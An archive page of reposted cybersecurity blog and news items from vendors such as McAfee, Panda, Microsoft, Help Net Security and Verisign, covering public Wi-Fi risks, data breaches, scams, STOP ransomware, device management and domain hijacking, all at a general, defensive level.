Category Archives: Cybersecurity

The Risks of Public Wi-Fi and How to Close the Security Gap

public wi-fi risksAs I write this blog post, I’m digitally exposed, and I know it. For the past week, I’ve had to log on to a hospital’s public Wi-Fi each day to work while a loved one recuperates.

What seems like a routine, casual connection to the hospital’s Wi-Fi isn’t. Using public Wi-Fi is a daily choice loaded with risk. Sure, I’m conducting business and knocking out my to-do list like a rock star but at what cost to my security?

The Risks

By using public Wi-Fi, I’ve opened my online activity and personal data (via my laptop) up to a variety of threats including eavesdropping, malware distribution, and bitcoin mining. There’s even a chance I could have logged on to a malicious hotspot that looked like the hospital network.

Like many public Wi-Fi spots, the hospital’s network could lack encryption, which is a security measure that scrambles the information sent from my computer to the hospital’s router so other people can’t read it. Minus encryption, whatever I send over the hospital’s network could potentially be intercepted and used maliciously by cybercriminals.

Because logging on to public Wi-Fi is often a necessity — like my situation this week — security isn’t always the first thing on our minds. But over the past year, a new normal is emerging. A lot of us are thinking twice. With data breaches, privacy concerns, the increase in the market for stolen credentials, and increasingly sophisticated online scams making the headlines every day, the risks of using public Wi-Fi are front and center.

Rising Star: VPNpublic wi-fi risks

The solution to risky public Wi-Fi? A Virtual Private Network (VPN). A VPN allows users to securely access a private network and share data remotely through public networks. Much like a firewall protects the data on your computer, a VPN protects your online activity by encrypting your data when you connect to the internet from a remote or public location. A VPN also conceals your location, IP address, and online activity.

Using a VPN helps protect you from potential hackers using public Wi-Fi, which is one of their favorite easy-to-access security loopholes.

Who Needs a VPN?

If you (or your family members) travel and love to shop online, access your bank account, watch movies, and do everyday business via your phone or laptop, a VPN would allow you to connect safely and encrypt your data no matter where you are.

A VPN can mask, or scramble, your physical location, banking account credentials, and credit card information.

Also, if you have a family data plan you’ve likely encouraged your kids to save data by connecting to public Wi-Fi whenever possible. Using a VPN, this habit would be secured from criminal sniffers and snoopers.

A VPN allows you to connect to a proxy server that will access online sites on your behalf and enables a secure connection most anywhere you go. A VPN also allows hides your IP address and allows you to browse anonymously from any location.

How VPNs work

To use a VPN you subscribe to VPN service, download the app onto your desktop or phone, set up your account, and then log onto a VPN server to conduct your online activity privately.

If you are still logging on to public Wi-Fi, here are a few tips to keep you safe until VPNs become as popular as Wi-Fi.

Stay Safe on Public Wi-Fi 

Verify your connection. Fake networks that mine your data abound. If you are logging on to Wi-Fi in a coffee shop, hotel, airport, or library, verify the exact name of the network with an employee. Also, only use Wi-Fi that requires a password to log on.public wi-fi risks

Don’t get distracted. For adults, as well as kids, it’s easy to get distracted and absorbed with our screens — this is risky when on public Wi-Fi, according to Diana Graber, author of Raising Humans in a Digital World. “Knowing how to guard their personal information online is one of the most important skills parents need to equip their young kids with today,” says Graber. “Lots of young people visit public spaces, like a local coffee shop or library, and use public Wi-Fi to do homework, for example. It’s not uncommon for them to get distracted by something else online or even tempted to buy something, without realizing their personal information (or yours!) might be at risk.”

Disable auto Wi-Fi connect. If your phone automatically joins surrounding networks, you can disable this function in your settings. Avoid linking to unknown or unrecognized networks.

Turn off Wi-Fi when done. Your computer or phone can still transmit data even when you are not using it. Be sure to disable your Wi-Fi from the network when you are finished using it.

Avoid financial transactions. If you must use public Wi-Fi, don’t conduct a sensitive transaction such as banking, shopping, or any kind of activity that requires your social security or credit card numbers or password use. Wait until you get to a secured home network to conduct personal business.

Look for the HTTPS. Fake or unsecured websites will not have the HTTPS in their address. Also, look for the little lock icon in the address bar to confirm a secure connection.

Secure your devices. Use a personal VPN as an extra layer of security against hackers and malware.

The post The Risks of Public Wi-Fi and How to Close the Security Gap appeared first on McAfee Blogs.

The Details of Roughly 620 Million Users Are Up for Sale on The Dark Web

Approximately 620 million records stolen from sixteen compromised websites are up for grabs on the Dark Web. According to The Register, the list includes users of the following companies; Dubsmash, MyFitnessPal, MyHeritage, ShareThis, HauteLook, Animoto, EyeEm, 8fit, Whitepages, Fotolog, 500px, Armor Games, BookMate, CoffeeMeetsBagel, Artsy, and DataCamp.

While some of the affected companies such as MyHeritage and MyFitnessPal have already announced that they were hacked last year, the list consists predominantly of newcomers who have just begun notifying their users about the breach. Some of the newcomers include 500px, DataCamp, EyeEm, and 8fit.

The massive database of stolen information is being offered on the Dream Market cyber-souk located in the Tor network for roughly $20,000 in Bitcoin, and according to The Register’s source, the database has been purchased at least once already. However, it is currently unknown how many cybercriminals have bought the list so far.
The database contains personal information such as full names, email addresses, passwords, and other data such as location, and social media authentication tokens. It is currently unknown if the list contains sensitive information such as SSN, DOB, and credit card details. It is assumed that most of the leaks included in the database come from data breaches that have happened over the last two years.

A MyHeritage spokesperson provided with the sample of the list confirmed that the information included in the list is legitimate and contains information illegally obtained from the organization a couple of years ago. EyeEm and 500px have already begun notifying the affected customers forcing them to change their passwords. The majority of the affected companies are still not actively working on forcing password change to the affected users.

This major collection of multiple data breaches is not to be mistaken with the 2.2 billion monster data collection that started circulating the Dark Web and various torrent websites a couple of weeks ago. It is currently unknown if the stolen data is part of the 2.2 billion monster data collection. It is also unknown if the details from the stolen data have been uploaded to Have I Been Pwned.

What should you do?

Hackers will most likely start using the stolen data to get access to other websites where the same login details have been reused. Such leaks make the life of hackers much more comfortable as they can use simple hacking techniques to get access to even more sensitive information for their targets.

The very first thing that you will have to do is to start practicing good password hygiene by changing your passwords regularity – often it takes years for a company to disclose that it has been breached. Changing your password at least once every three months is indeed a good practice.

Don’t be tempted to reuse passwords on different websites. If you are too confused to remember all passwords, it is worth using antivirus software – the best antivirus software solutions not only protect you from hackers but also come with useful features such as password managers.

Download your Antivirus

The post The Details of Roughly 620 Million Users Are Up for Sale on The Dark Web appeared first on Panda Security Mediacenter.

Three reasons employee monitoring software is making a comeback

Companies are increasingly implementing employee and user activity monitoring software to: Ensure data privacy Protect intellectual property and sensitive data from falling into the wrong hands Stop malicious or unintentional data exfiltration attempts Find ways to optimize processes and improve employee productivity. Modern user activity monitoring software is incredibly flexible, providing companies with the insights they need while offering the protection they demand. By examining three prominent use cases, it’s evident that employee monitoring software … More

The post Three reasons employee monitoring software is making a comeback appeared first on Help Net Security.

Machine learning fundamentals: What cybersecurity professionals need to know

In this Help Net Security podcast, Chris Morales, Head of Security Analytics at Vectra, talks about machine learning fundamentals, and illustrates what cybersecurity professionals should know. Here’s a transcript of the podcast for your convenience. Hi, this is Chris Morales and I’m Head of Security Analytics at Vectra, and in this Help Net Security podcast I want to talk about machine learning fundamentals that I think we all need to know as cybersecurity professionals. AI … More

The post Machine learning fundamentals: What cybersecurity professionals need to know appeared first on Help Net Security.

Increased appetite for biometrics fueled by speed, security and convenience

The Biometric Consumer Sentiment Survey of more than 1,000 U.S. adults who have experience using biometrics to log into their accounts, reveals an increased appetite for the technology. 70 percent of respondents reported that they would like to expand the use of biometric authentication into the workplace, according to Veridium. Consumers cited speed (35 percent), security (31 percent) and not having to remember passwords (33 percent) as the primary reasons for liking biometric authentication. “The … More

The post Increased appetite for biometrics fueled by speed, security and convenience appeared first on Help Net Security.

SaaS spending increasing by 78 percent year-over-year

43% of the average company’s SaaS application stack changed in the last two years, according to the 2019 Annual SaaS Trends report. This is far greater than the typical employee churn rate. Meanwhile, spending has not slowed down – the average SaaS spend per company increased 78 percent year-over-year across organizations in Blissfully’s dataset. This rapid pace of technology change shows that organizations are willing to go to great lengths to increase their teams’ productivity … More

The post SaaS spending increasing by 78 percent year-over-year appeared first on Help Net Security.

How organizations handle disruptive data sources

In the 2018 Data Connectivity Survey by Progress, more than 1,400 business and IT professionals in various roles across industries and geographies shared their insights on the latest trends within the rapidly changing enterprise data market. The findings revealed five data-related areas of primary importance for organizations as they migrate to the cloud: data integration, real-time hybrid connectivity, data security, standards-based technology and open analytics. Significant findings from the survey include: Data integration has become … More

The post How organizations handle disruptive data sources appeared first on Help Net Security.

How To Sidestep Popular Social Scams

Each year, internet users lose billions of dollars to online scams, using clever ploys to trick us out of our information and money. By offering prizes, referencing current events, or just creating a sense of urgency, scammers know how to get us to click when we really shouldn’t. Check out these recent scams, so you know what to look out for.

Nosy Quizzes & Questionnaires

Quizzes circulating on Facebook, Twitter, and other social platforms may look like a fun way to win free stuff, but often they are phishing attacks in disguise. Many appear to be sponsored by big-name brands such as airlines and major retailers, offering free products or discount tickets if you just answer a few questions. The questions are designed to get you to reveal personal information that can be used to guess your passwords or security questions, such as your mother’s maiden name, or your hometown.

Creepy Crypto Scams 

While cryptocurrencies lost a lot of value over the last year, the same cannot be said for cryptocurrency scams. The majority of them center on distributing crypto mining malware, which allows hackers to access a person’s computer or device without their permission in order to mine for cryptocurrencies. In fact, these scams have been so prolific that at the end of 2018 McAfee reported that coin mining malware had grown more than 4000% in the previous year.

Many of these miners were distributed through phishing emails and websites, using “giveaway” scams on social media, or even via crypto mining chat groups on platforms such as Slack. Cybercrooks enter the chat rooms, pretending to be fellow miners, and encourage users to download malware disguised as “fixes” to crypto issues.

Romance & “Sextortion” Scams 

The meteoric rise of online dating has led to a similar increase in romance scams. These often involve bad actors preying on lonely people who are looking to connect. Scammers build up a sense of trust over online dating and social media platforms, before asking for money. They often claim the money is for an emergency, or a plane ticket to visit. This kind of manipulation works so well that the Better Business Bureau estimates that victims in the U.S. and Canada lost nearly $1 billion to romance scams between 2015 and 2018.

And while romance is one way to manipulate users, another driver is fear. This is certainly the case with the recent rise in so-called “sextortion” scams, which scare users into paying money to prevent incriminating pictures or videos of them from getting out. The bad guys claim that they obtained the embarrassing content by infecting the victim’s device with malware, and often send part of an old, leaked password as proof that they could have accessed their account.

Topical News Hooks

Whenever a major story sweeps the news, chances are the scammers are looking for ways to capitalize on it. This is exactly what happened during the recent U.S. government shutdown, which left 800,000 federal employees out of work for over a month. Since many of these workers were looking for extra income, job scams abounded. Some phony job ads asked workers to fill out detailed job application forms, in order to steal their Social Security numbers and other private information.

In another ruse, scammers sent out phony emails that appeared to be from the IRS, saying that the recipient could get a discount on their tax bills if they paid during the shutdown.

Tried-and-True Scams

Package Delivery— Phony package delivery emails usually spike around the holidays, but in the age of Amazon Prime delivery scams are circulating year-round. Be on the lookout for more recent Amazon scams that come in the form of a phishing email, asking you to review a product to get rewards. If you click on the link it could deliver malware, or even ransomware.

Tech Support— This is one of the oldest, but most persistent scams to date. Phishing websites and phony pop-up warnings that a computer or device is infected have led thousands of people to hand over personal and financial information to fix a problem they don’t really have.

Even though consumers have become savvier about these scams, a recent Microsoft survey found that 3 out of 5 people have been exposed to tech support scams over the last year.

So, now that you know what to look out for, here are our top tips for sidestepping the scammers:

  • Be careful where you click—Don’t open suspicious links and attachments, and never click on pop-up messages from an unknown source. If you get a suspicious login or payment request, go directly to the provider’s official website to see if the request is legitimate.
  • Know how to spot the fake—Phony messages or documents will often look like a simplified version of the real thing, with poor quality graphics, incorrect grammar and spelling, and a generic personal greeting.
  • Keep your personal information private—Avoid online quizzes, and never share personal or financial details with someone you don’t know in real life. Review your privacy and security settings on social sites to make sure that you aren’t leaking information.
  • Be a smart online shopper—Only buy from reputable websites, and steer away from deals that seem too good to be true. Be suspicious of unusual payment requests, such as buying gift cards or using virtual currency.
  • Become a password pro—Choose complex and unique passwords for all of your accounts. Consider using a password manager to help you create and store complicated passwords securely.
  • Protect your computers and devices—Use comprehensive security software that can safeguard you from the latest threats.

Looking for more mobile security tips and trends? Be sure to follow @McAfee Home on Twitter, and like us on Facebook.

The post How To Sidestep Popular Social Scams appeared first on McAfee Blogs.

Step 5. Set up mobile device management: top 10 actions to secure your environment

The Top 10 actions to secure your environment series outlines fundamental steps you can take with your investment in Microsoft 365 security solutions. In Step 5. Set up mobile device management, youll learn how to plan your Microsoft Intune deployment and set up Mobile Device Management (MDM) as part of your unified endpoint management (UEM) strategy.

In Steps 1-4 of the series, we provided tips for securing identities with Azure Active Directory (Azure AD). In the next two posts (Step 5 and Step 6), we introduce you to ContosoCars to illustrate how you can deploy Microsoft Intune as part of your UEM strategy for securing company data on devices and applications.

ContosoCars is an automotive company with 1,000 employees that work in the corporate headquarters, and 4,000 that work in several branches across the U.S. Another 2,000 service centers are owned by franchises. To stay competitive, IT needs to support a fleet of cloud-connected devices for secure, remote access to Office 365 and SaaS apps and sensitive customer data. With their expanding business, franchise sales staff need access to ContosoCars customer data as well, but ContosoCars does not own those devices.

They have defined the following goals:

  • Deliver the best Windows 10 experience for all their corporate PCs.
  • Allow employees to use personal devices and mobile phones at work.
  • Protect the network from unknown or compromised users and devices.
  • Secure data on tablet devices shared by several shop floor workers that are often left in public areas of the shop.
  • Prevent employees from accessing and maintaining corporate data if they leave the company.

Plan your Intune deployment

Once ContosoCars defines their goals, they can begin to set up use-case scenarios to align their goals with user types and user groups (Figure 1). ContosoCars wants to provide corporate devices for their employees at headquarters and branches. They will not supply devices to their franchise sales staff, but they need to make sure staff-owned tablets can use Office 365 apps to securely access company data.

Graph showing ContosoCars locations, device ownership, groups, platforms, and requirements. All part of their use-case management plan.

Figure 1. ContosoCars’ defined Intune use-case scenarios and requirements.

You can find more information on setting goals, use-case scenarios, and requirements in the Intune deployment planning, design, and implementation guide. The guide also includes recommendations for a design plan that integrates well with existing systems, a communication plan that takes into account the different channels your audience uses to receive information, a rollout plan, and a support plan.

Set up Mobile Device Management (MDM)

Once planning is complete, ContosoCars can move onto implementing their Intune plan. ContosoCars uses Azure AD to fully leverage Office 365 cloud services and get the benefits of identity-driven security (see Step 1. Identify users). Before employees can enroll their devices to be managed by Intune, IT admins will need to set MDM authority to Intune in the Azure portal.

In order to manage the devices, ContosoCars can add and deploy configuration policies to enable and disable settings and features such as software delivery, endpoint protection, identity protection, and email. ContosoCars can also use configuration policies to deploy Windows Defender Advanced Threat Protection (ATP), which provides instant detection and blocking of advanced threats. Once IT admins set up Intune, users can enroll devices by signing in with their work or school account to automatically receive the right configuration profiles for their device.

ContosoCars can configure devices to meet business requirements and enable security features, such as Windows Hello, which allows users to sign in to their computer using a combination of biometrics and a PIN.

Manage personal devices

Next on the rollout plan are the personal iPhones and Android phones used by the staff to keep up with work email and data. ContosoCars will manage these devices by requiring employees to enroll their devices with Intune before allowing access to work apps, company data, or email using enrollment requirements guidance. ContosoCars can set up configuration policies for these devices just as they did the Windows 10 PCs, and they can add additional security controls by setting up device compliance policies. Using Azure AD you can allow or block users in real-time if their compliance state changes. These policies ensure only known and healthy devices enter the network.

Some examples include:

  • Require users to set a password to access devices; password must be of certain complexity.
  • Require users to set a PIN to encrypt the device; PIN must be of certain complexity.
  • Deny access to jail-broken or rooted devices, as they may have unknown apps installed.
  • Require a minimum OS version to ensure security patch level is met.
  • Require the device to be at, or under, the acceptable device-risk level.

With Windows 10, conditional access policies are integrated with Windows Defender ATP. Microsoft works with leading mobile threat defense technology partners to provide comprehensive device-risk assessment on all platforms.

Learn more

Check back in a few weeks for our next blog post, Step 6. Manage mobile apps, where we explore the use of Intune app protection policies to allow only approved applications to access work email and data. We will also learn how ContosoCars keeps sensitive customer data secure on shared franchise devices on the shop floor.

Get deployment help now

FastTrack for Microsoft 365 provides end-to-end guidance to set up your security products. FastTrack is a deployment and adoption service that comes at no charge with your subscription. Get started at FastTrack for Microsoft 365.

Resources

The post Step 5. Set up mobile device management: top 10 actions to secure your environment appeared first on Microsoft Secure.

Most companies anticipate a critical breach in 2019, CISOs need to prioritize threats

80 percent of IT business leaders anticipate a critical breach or successful cyberattack over the coming year, according to the Cyber Risk Index (CRI), a Trend Micro survey of more than 1,000 IT security professionals in the United States. The CRI survey was conducted to measure business risk based on the difference between organizations’ current security posture and their likelihood of attack, with the goal of helping CISOs and their teams better assess, protect, detect, … More

The post Most companies anticipate a critical breach in 2019, CISOs need to prioritize threats appeared first on Help Net Security.

Most wanted malware in January 2019: A new threat speaks up

Check Point’s Global Threat Index for January 2019 reveals a new backdoor Trojan affecting Linux servers, which is distributing the XMRig crypto-miner. The new malware, dubbed SpeakUp, is capable of delivering any payload and executing it on compromised machines. The new Trojan currently evades all security vendors’ anti-virus software. It has been propagated through a series of exploitations based on commands it receives from its control center, including the 8th most popular exploited vulnerability, “Command … More

The post Most wanted malware in January 2019: A new threat speaks up appeared first on Help Net Security.

NIST Cybersecurity Framework: Five years later

Five years after the release of the Framework for Improving Critical Infrastructure Cybersecurity, organizations across all sectors of the economy are creatively deploying this voluntary approach to better management of cybersecurity-related risks. The U.S. Department of Commerce’s National Institute of Standards and Technology (NIST) issued what is now widely known simply as the “NIST Cybersecurity Framework” on February 12, 2014. Its development was the result of a year-long collaborative process involving hundreds of organizations and … More

The post NIST Cybersecurity Framework: Five years later appeared first on Help Net Security.

The evolution of Microsoft Threat Protection, February update

February is an exciting month of enhancements for Microsoft Threat Protection. For those who have followed our monthly updates (November, December, and January), youre aware that Microsoft Threat Protection helps provide users optimal security from the moment they sign in, use email, work on documents, or utilize cloud applications. IT administrators benefit from minimal complexity while staying ahead of threats to their organization. Microsoft Threat Protection is one of the few available services helping provide comprehensive security across multiple attack vectors. This month, we share enhancements to identity protection, the launch of the Microsoft 365 security center, and another example of Microsoft Threat Protection mitigating a real-world attack.

Enhancing identity protection

Currently, 81 percent of all cyberattacks are due to weak or compromised credentials. Weak identity protection exposes all other attack surfaces to cyberthreats. With this in mind, Microsoft has invested heavily in identity protectionensuring it continues as one of our fundamental strengths and differentiators. Microsoft Threat Protection leverages Azure Active Directory (Azure AD) Identity Protection, to provide comprehensive, industry leading identity protection for hundreds of millions of users. This month, were excited to announce enhancements to our identity protection capabilities with the following updates to Azure AD Identity Protection:

  • An intuitive and integrated UX for Azure AD Identity Protectionincluding security insights, recommendations, sign-ins report integration, and the ability to filter, sort, and perform bulk operations (Figure 1).
  • Powerful APIs that allow you to integrate all levels of risk data with ticketing or SIEM systems.
  • Improved risk assessment based on continuously tuning our heuristic and machine learning systems to bring you even more accurate risk analysis to drive your prevention and remediation strategy.
  • Service-wide alignmentacross risky users and risky sign-ins.

Screenshot of the new Azure AD Identity Protection Security Overview dashboard.

Figure 1. The new Azure AD Identity Protection Security – Overview dashboard.

Each of these updates is based on customer feedback and our deep domain expertise. With these updates, we continue to improve and build on securing identities for thousands of customers. In fact, several customers such as The Walsh Group, Abtis, Identity Experts, and BDO Netherlands have already experienced the benefits of these new enhancements. We hope you try the refreshed Azure AD Identity Protection. Get the full details of these updates in our blog postand please share your thoughts via the in-product prompts.

Reducing complexity with the Microsoft 365 security center

Microsoft Threat Protection is built on the Microsoft Intelligent Security Graph, which provides a deep and broad threat signal and leverages machine learning for intelligent signal correlation. Many of our customers have often asked us to provide a “single pane of glass” that provides a centralized experience across their Microsoft security services and helps correlate signals from disparate sources, to provide richer insights that lead to intelligent security decisions.

To address this critical customer ask, we recently launched the Microsoft 365 security center (Figure 2), which helps surface much of these correlated signals in a detailed and elegant user interface, helping reduce the complexity of an organizations security environment. The new Microsoft 365 security center (which can be accessed at security.microsoft.com) provides security administrators (SecAdmins) a centralized hub and specialized workspace to manage and take full advantage of most Microsoft Threat Protection services. Admins will gain the visibility, control, and guidance necessary to understand and act on the threats currently impacting their organization, as well as information on past and future threats.

Screenshot of the new Microsoft 365 security center.

Figure 2. The new Microsoft 365 security center (security.microsoft.com).

The Microsoft 365 security center also provides experiences for security operators (SecOps) through the integration of incident response capabilities such as a centralized alert view and powerful hunting capabilities enabling ad-hoc investigations. Well be making continuous enhancements to the Microsoft 365 security center and providing updates on its progress.

Microsoft Threat Protection secures think tanks, non-profits, and the public sector from unidentified attackers

While our updates on new features and enhancements hopefully convey our focus and investment in providing best-in-class security, Microsoft Threat Protections ability to stop real-world threats is ultimately the truest test. Recently, Microsoft Threat Protection helped secure several public sector institutions and non-governmental organizations like think tanks, research centers, educational institutions, private-sector corporations in the oil and gas, chemical, and hospitality industries from a very aggressive cyberattack. Some third-party security researchers have attributed the attack to CozyBear, though Microsoft does not believe there is yet enough evidence to attribute the attack to CozyBear. Figure 3 shows the full attack chain.

Graph of the attack chain of a recent threat to public sector and other non-government agencies by unidentified attacker.

Figure 3. Attack chain of recent threat to public sector and other non-government agencies by unidentified attacker.

Customers using the completeMicrosoft Threat Protectionsolution were secured from the attack. Behavior-based protections in multiple Microsoft Threat Protection components blocked malicious activities and exposed the attack at its early stages.Office 365 Advanced Threat Protection detected emails with malicious URLs, blocking them, including samples which had never been seen before. Meanwhile, numerous alerts inWindows Defender Advanced Threat Protection (ATP)exposed the attacker techniques across the attack chain.

Due to the nature of the victims, and because the campaign features characteristics of previously observed nation-state attacks, Microsoft took the added step of notifying thousands of individual recipients in hundreds of targeted organizations. As part of theDefending Democracy Program, Microsoft encourages eligible organizations to participate inMicrosoft AccountGuard, a service designed to help these highly targeted customers protect themselves from cybersecurity threats. Learn about the full analysis in our recent blog.

Experience the evolution of Microsoft Threat Protection

Take a moment to learn more about Microsoft Threat Protection, read our previous monthly updates, and visit Integrated and automated security. Organizations have already transitioned to Microsoft Threat Protection and partners are leveraging its powerful capabilities.

Begin trials of the Microsoft Threat Protection services today to experience the benefits of the most comprehensive, integrated, and secure threat protection solution for the modern workplace.

The post The evolution of Microsoft Threat Protection, February update appeared first on Microsoft Secure.

Cyberinsurance and Acts of War

I had not heard about this case before. Zurich Insurance has refused to pay Mondelez International's claim of $100 million in damages from NotPetya. It claims it is an act of war and therefor not covered. Mondelez is suing.

Those turning to cyber insurance to manage their exposure presently face significant uncertainties about its promise. First, the scope of cyber risks vastly exceeds available coverage, as cyber perils cut across most areas of commercial insurance in an unprecedented manner: direct losses to policyholders and third-party claims (clients, customers, etc.); financial, physical and IP damages; business interruption, and so on. Yet no cyber insurance policies cover this entire spectrum. Second, the scope of cyber-risk coverage under existing policies, whether traditional general liability or property policies or cyber-specific policies, is rarely comprehensive (to cover all possible cyber perils) and often unclear (i.e., it does not explicitly pertain to all manifestations of cyber perils, or it explicitly excludes some).

But it is in the public interest for Zurich and its peers to expand their role in managing cyber risk. In its ideal state, a mature cyber insurance market could go beyond simply absorbing some of the damage of cyberattacks and play a more fundamental role in engineering and managing cyber risk. It would allow analysis of data across industries to understand risk factors and develop common metrics and scalable solutions. It would allow researchers to pinpoint sources of aggregation risk, such as weak spots in widely relied-upon software and hardware platforms and services. Through its financial levers, the insurance industry can turn these insights into action, shaping private-sector behavior and promoting best practices internationally. Such systematic efforts to improve and incentivize cyber-risk management would redress the conditions that made NotPetya possible in the first place. This, in turn, would diminish the onus on governments to retaliate against attacks.

SMBs spending a day each week dealing with cybersecurity issues

Almost half of UK small to medium-sized businesses (SMBs) believe a cyberattack would put their business at risk of closure, and 48 per cent of businesses report they have had to deprioritise activities that would help grow their business to address cybersecurity, a new research from Webroot reveals. The report, titled “Size Does Matter,” details the challenging climate for UK SMBs in a time of rapid political, economic and social change. Second only to Brexit, … More

The post SMBs spending a day each week dealing with cybersecurity issues appeared first on Help Net Security.

Healthcare email fraud: Attack attempts jump 473% over two years

Proofpoint found that healthcare organisations were targeted in 96 email fraud attacks on average in Q4 2018 – a 473 percent jump from Q1 2017. More than half of these organisations (53 percent) were attacked more often, with incidents up between 200 and 600 percent during the two-year period. Researchers analysed more than 160 billion emails sent across 150 countries in both 2017 and 2018 to identify email fraud attack trends targeting more than 450 … More

The post Healthcare email fraud: Attack attempts jump 473% over two years appeared first on Help Net Security.

Nearly two-thirds of organizations say tech skills gap is impacting IT audits

Technologies such as AI are reshaping the future of IT auditors, but auditors are largely optimistic about the future, according to new research from ISACA. In the Future of IT Audit, the results of a survey of more than 2,400 IT auditors worldwide, 92 percent of IT auditors responded that they are optimistic about how technology will impact them professionally over the next five years. Nearly 8 in 10 say their IT audit team has … More

The post Nearly two-thirds of organizations say tech skills gap is impacting IT audits appeared first on Help Net Security.

Impersonation, sender forgery and corporate email spoofing top the charts

This Q4 of 2018 was a busy period for phishing scammers. INKY researchers saw a spike in email volume this time of year as people use email to gather their receipts from online shopping, shipping notifications, returns, and virtual holiday greetings. For its 2018 Q4 email security report, the company pulled out the highest volume attack types and broke down each one. The majority of attacks that were analyzed showed an increase in target personalization, … More

The post Impersonation, sender forgery and corporate email spoofing top the charts appeared first on Help Net Security.

STOP ransomware claims even more victims

Despite having been ‘in the wild’ for some weeks now, infections caused by STOP ransomware have continued to rise. Perhaps somewhat ironically, those most affected (at the moment) appear to be software pirates.

Security analysts have discovered the STOP executable is being bundled with adware installers, commonly found on websites hosting warez and software licensing cracks. As well as downloading illegal software, users may also be downloading – and installing – malware on their computer.

Much worse than adware

Although they exhibit virus-like behaviours, adware is usually more of an annoyance. But once compromised by STOP, the annoyance becomes a serious problem.

Once installed, STOP quickly encrypts all of the user’s documents, changing the filename to .djvu, .tro or .rumba. Once encrypted, the file is completely inaccessible. The malware also creates a text file (called _openme.txt) in each affected folder, explaining that the machine is infected and the user cannot access their data until they pay a ransom of $980. If the user pays within 72 hours of infection, the cost is reduced to $490.

The text file also contains a ‘personal ID’ which the hackers claim is used to generate the decryption key needed to restore access to affected files. Without decryption, the user cannot access any of their files or photos.

What if I have been infected by STOP?

Tampering with the encrypted files may permanently damage them, and the chances of guessing the correct decryption key are virtually zero. The only sure way to regain access to your data is to restore everything from backup.

Restoring data is time consuming and (sometimes) complicated – and you need a full backup of all your files and applications too. If you do not currently backup your data NOW is the time to start.

Alternatively, you could pay the ransom. Bear in mind however that you are dealing with criminals who may increase the ransom again. Or steal your money without supplying a decryption key at all.

Some technical sources suggest that STOP can be reversed, but you will need to seek advice from an expert. As always, these services are unlikely to offer any form of guarantee of success and you could still lose all your data.
Protecting against STOP ransomware infections

Preventing STOP ransomware infections is possible if you do the following:

  1. Install anti-malware protection. Panda Dome Advanced provides security tools that block STOP and other ransomware from installing on your computer. Download a free trial now to get started.
  2. Avoid warez and crack websites. Using warez to steal software is illegal – and these sites are notorious for hosting malware anyway. Paying for some software may be expensive, but it is far cheaper than losing all your files to a virus. Panda Dome can also be configured to block access to warez sites to protect you and your family.
  3. Take regular backups. Windows 10 and Mac OS both make it incredibly easy to take full backups of your machine. Once configured, your computer will take care of the rest. If something does go wrong in the future, you will have a copy of all your files ready to restore quickly.

Ransomware is very effective because it targets people who aren’t prepared. By installing anti-malware tools, checking your web surfing behaviour and performing routine data backups, you stand a very good chance of avoiding STOP infections.

Download your Antivirus

The post STOP ransomware claims even more victims appeared first on Panda Security Mediacenter.

Security wellness takes more than a fad diet

Every year, millions of people make the same New Year’s resolution: to lose weight and improve health. But by February, a mere thirty days or so into the year, stats show 75 percent of us have fallen off the wagon. The pitfalls are many, whether the resolution is vague and broad, or we neglect to set measurable goals and regular check-ins, or perhaps we’re just not really ready for change. Achieving a true state of … More

The post Security wellness takes more than a fad diet appeared first on Help Net Security.

Is 2019 the year national privacy law is established in the US?

Data breaches and privacy violations are now commonplace. Unfortunately, the consequences for US companies involved can be complicated. A company’s obligation to a person affected by a data breach depends in part on the laws of the state where the person resides. A person may be entitled to free credit monitoring for a specified period of time or may have the right to be notified of the breach sooner than somebody living in another state. … More

The post Is 2019 the year national privacy law is established in the US? appeared first on Help Net Security.

88% of UK businesses breached during the last 12 months

The UK’s cyber threat environment is intensifying. Attacks are growing in volume, and the average number of breaches has increased, according to Carbon Black. Key survey research findings: 88% of UK organizations reported suffering a breach in the last 12 months The average number of breaches per organization over the past year was 3.67 87% of organizations have seen an increase in attack volumes 89% of organizations say attacks have become more sophisticated 93% of … More

The post 88% of UK businesses breached during the last 12 months appeared first on Help Net Security.

People still shocked by how easy it is to track someone online

Netflix’s hit series You, has got people discussing their online privacy and traceability. However, McAfee, the device-to-cloud cybersecurity company, discovered less than a fifth (17%) of Brits who lost or had their phone stolen (43%) made any attempt to prevent criminals from accessing data stored on the device or in the cloud. Only 17% said they remotely locked or changed passwords and a mere 12% remotely erased data from the lost or stolen device to … More

The post People still shocked by how easy it is to track someone online appeared first on Help Net Security.

Revisiting How Registrants Can Reduce the Threat of Domain Hijacking

Recent events1,2 have shown the threat of domain hijacking is very real; however, it is also largely preventable. As Verisign previously noted3, there are many security controls that registrants can utilize to help strengthen their security posture. Verisign would like to reiterate this advice within the context of the recent domain hijacking reports.

Domains are an important element of internet infrastructure; their functionality and security rely upon many factors such as their delegated name servers. Name server delegations introduce complex and subtle inter-dependencies between domains and their authoritative name servers. Compromise of any name server in the delegation hierarchy can lead to a potential hijacking scenario. Targeted name server compromises in the delegation hierarchy can facilitate a complete hijack of a domain or set of domains, while name server compromises deeper in the delegation hierarchy may result in partial hijacking, since not all name servers in the hierarchy are involved in every DNS resolution request. A compromised name server is capable of diverting DNS requests to malicious servers controlled by threat actors and can be weaponized for phishing attacks or other nefarious purposes.

Over the past several weeks, security professionals have issued reports1, 2 about the hijacking of various domains via their name server delegations. These changes were likely made using compromised registrar credentials and are believed to be backed by a foreign nation state entity1, 2. During the attacks, the threat actors used the traffic directed to their infrastructure to launch spear phishing campaigns against various government entities in northern Africa and the Middle East. These targeted spear phishing attempts were facilitated by the transitive trust4 placed on the compromised domains and their delegated name servers.

Several of the compromised domains contained hosts that were specified as name servers for numerous top-level domains (TLDs) including country code TLDs5 in the northern African and Middle East regions. Subsequently, DNS traffic resolution for corresponding reliant zones were partially/completely routed to the threat actors’ infrastructure. This redirection of DNS traffic facilitated their ability to target specific government and industry entities in the targeted countries. While the domains did not employ a domain locking tool, some were DNSSEC6 signed, which helped mitigate the attack for resolving parties that perform validation.

As part of the response to this incident, the Department of Homeland Security issued Emergency Directive 19-017 requiring federal civilian agencies to address the risks presented by this activity. The order mandated four actions to be taken: 1) Audit DNS records, 2) Change DNS account passwords, 3) Add multi-factor authentication to DNS accounts and 4) Monitor Certificate Transparency logs.

Verisign is engaged with various industry and government entities regarding this incident and has provided technical insights into the DNS ecosystem regarding the complex mechanisms and system-to-system interactions/dependencies involved. To date, there is no evidence that the scope of compromise extends beyond the sets of credentials at various registrars.

